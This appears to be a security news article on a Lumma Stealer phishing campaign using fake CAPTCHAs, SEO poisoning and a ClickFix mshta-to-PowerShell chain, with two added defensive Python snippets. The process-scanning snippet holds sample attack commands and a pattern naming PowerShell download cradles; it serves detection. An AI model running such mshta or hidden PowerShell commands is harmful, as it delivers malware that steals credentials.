Massive Phishing Campaign Uses Fake CAPTCHAs to Spread Lumma Stealer Malware
Cybercriminals are stepping up their game with a new large-scale phishing campaign that delivers the Lumma Stealer malware through fake CAPTCHA images embedded in PDF files. According to Netskope Threat Labs, this campaign has already compromised over 7,000 users across 1,150 organizations, mainly targeting the technology, financial services, and manufacturing sectors in North America, Asia, and Southern Europe.
Researchers found 5,000 malicious PDFs hosted on 260 different domains, many of which belong to Webflow, GoDaddy, Strikingly, Wix, and Fastly. The attackers use SEO manipulation to trick victims into clicking on these documents from search engine results, ultimately redirecting them to sites designed to either steal credit card details or infect their systems with Lumma Stealer malware.
How the Attack Works
The attackers distribute PDF files that contain fake CAPTCHA images. Victims who click on these CAPTCHAs are redirected to malicious websites where they are either tricked into entering sensitive financial details or are infected with malware through a PowerShell-based attack.
The Lumma Stealer variant in this campaign is deployed through a ClickFix technique, which tricks users into executing an MSHTA command. This command runs a hidden PowerShell script that downloads and installs the Lumma Stealer malware onto the victim’s system.
Key Tactics Used in This Campaign
- Search Engine Optimization (SEO) Poisoning – Malicious PDFs are uploaded to online libraries and repositories like PDFCOFFEE, PDF4PRO, PDFBean, and Internet Archive, making them appear in legitimate search results.
- Fake CAPTCHA Verification – Victims who attempt to "verify" themselves by clicking the CAPTCHA unknowingly execute malicious commands.
- MSHTA and PowerShell Abuse – The attack evades security controls by running the malware through trusted, signed Windows utilities rather than a dropped executable.
- Widespread Hosting Infrastructure – The phishing PDFs are spread across hundreds of domains, making takedown efforts more challenging.
Lumma Stealer: A Dangerous Infostealer on the Rise
Lumma Stealer is a Malware-as-a-Service (MaaS) tool designed to harvest sensitive data from compromised Windows machines. It can steal login credentials, browser cookies, crypto wallets, and other valuable information.
Recently, Lumma operators expanded its capabilities by integrating with GhostSocks, a Golang-based proxy malware. This lets threat actors route traffic through victims’ internet connections to bypass geographic restrictions and evade financial fraud controls that would otherwise flag the access as unauthorized.
Stolen credentials and data from Lumma infections are frequently shared on underground forums like Leaky[.]pro, a relatively new hacking marketplace that emerged in late December 2024.
Other Threats Leveraging the ClickFix Technique
Lumma Stealer isn’t the only malware delivered through ClickFix-style phishing. Researchers from Zscaler ThreatLabz and eSentire have observed similar tactics used to distribute:
- Vidar Stealer
- Atomic macOS Stealer (AMOS)
- DeepSeek AI Chatbot-themed malware
Additionally, Juniper Threat Labs has spotted phishing attacks using Unicode obfuscation methods to evade detection. These attacks hide binary values in invisible Hangul filler characters (U+FFA0 and U+3164), so the malicious JavaScript payload looks like empty strings to a human reader and is harder for security tools to detect.
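As an added example that is not from the article or from Juniper's research, the following Python snippet flags JavaScript source that carries runs of the two invisible filler code points and strips them so an analyst can see what the visible script does; the sample scripts and the thresholds are constructed for illustration.

```python
import re

# The two invisible Hangul filler code points named in the Juniper report.
FILLERS = "\uffa0\u3164"
FILLER_RUN = re.compile(f"[{FILLERS}]{{8,}}")


def find_filler_runs(source: str) -> list:
    """Return (offset, length) for every run of 8+ consecutive filler characters."""
    return [(m.start(), m.end() - m.start()) for m in FILLER_RUN.finditer(source)]


def filler_ratio(source: str) -> float:
    """Fraction of all characters in the script that are invisible fillers."""
    if not source:
        return 0.0
    return sum(ch in FILLERS for ch in source) / len(source)


def is_suspicious(source: str, max_ratio: float = 0.1) -> bool:
    """Flag scripts with a long filler run or an unusually high filler share.

    The thresholds are assumptions for this example, not values from the report."""
    return bool(find_filler_runs(source)) or filler_ratio(source) > max_ratio


def strip_fillers(source: str) -> str:
    """Remove the fillers so the visible part of the script can be reviewed."""
    return source.translate({ord(c): None for c in FILLERS})


# Constructed sample: a string literal made of 64 invisible fillers
# (it renders as an empty string in most editors and log viewers).
HIDDEN = "".join("\uffa0" if i % 3 else "\u3164" for i in range(64))
SUSPECT_JS = 'var s = "' + HIDDEN + '";\nconsole.log(s.length);\n'
CLEAN_JS = 'var s = "hello";\nconsole.log(s.length);\n'

if __name__ == "__main__":
    for name, js in (("suspect", SUSPECT_JS), ("clean", CLEAN_JS)):
        print(name, is_suspicious(js), find_filler_runs(js))
```

A production scanner would extend the character class to other zero-width and format code points rather than only these two.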
How to Protect Yourself from Lumma Stealer and Similar Attacks
Given the sophistication and scale of this campaign, organizations and individuals should take immediate action to enhance their cybersecurity defenses.
- Avoid Clicking on Suspicious PDF Links – Be cautious when downloading PDFs from search results, email attachments, or unknown sources.
- Verify CAPTCHA Pages – Legitimate CAPTCHAs do not require downloading files or running scripts.
- Monitor Webflow and Other Hosting Services – Security teams should track malicious use of their domains and report suspicious content.
- Restrict PowerShell and MSHTA Execution – Implement Group Policy restrictions to prevent attackers from abusing Windows tools to run malicious code.
- Educate Employees on Phishing Techniques – Train staff to recognize fake CAPTCHAs, SEO-based phishing, and other social engineering tactics.
- Deploy Advanced Threat Protection – Use endpoint detection and response (EDR) solutions to detect PowerShell abuse, suspicious web traffic, and infostealer malware activity.
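As an added illustration of the detection advice above (example code, not from the article, Netskope, or any EDR product), this Python snippet scans constructed Sysmon-style process-creation events for the mshta.exe to PowerShell chain used in the campaign; field names follow Sysmon Event ID 1, and the sample values, paths and placeholder are made up.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 field names,
# made-up values); the placeholder stands in for an encoded script argument.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify/captcha.hta"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden "
                    "-EncodedCommand <ENCODED_SCRIPT_PLACEHOLDER>"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly_backup.ps1"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Download cradles and encoded commands typical of a ClickFix PowerShell stage.
CRADLE = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|encodedcommand", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list:
    """Return the detection findings for one process-creation event."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event.get("CommandLine", "")
    findings = []
    if parent == "mshta.exe" and child in POWERSHELL:
        findings.append("mshta.exe spawned PowerShell (ClickFix chain)")
    if child == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        findings.append("mshta.exe launched with a remote URL")
    if child in POWERSHELL:
        if HIDDEN_WINDOW.search(cmd):
            findings.append("PowerShell started with a hidden window")
        if CRADLE.search(cmd):
            findings.append("PowerShell download cradle or encoded command")
    return findings


def scan(events: list) -> dict:
    """Map event index -> findings, keeping only events that triggered a rule."""
    results = {}
    for i, event in enumerate(events):
        hits = analyze(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], hits, sep="\n  ")
```

The same rules map directly onto a SIEM query or Sysmon configuration; the scheduled backup script in the third event shows why the parent process and command-line flags, not PowerShell alone, should drive the alert.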
Final Thoughts
This phishing campaign highlights how cybercriminals are evolving their techniques to distribute Lumma Stealer and other malware. By using fake CAPTCHAs in PDFs, SEO poisoning, and advanced obfuscation methods, attackers are successfully bypassing traditional security measures.
With thousands of users already compromised and malware distribution tactics expanding, businesses must stay vigilant, educate employees, and implement strong security measures to defend against these evolving threats.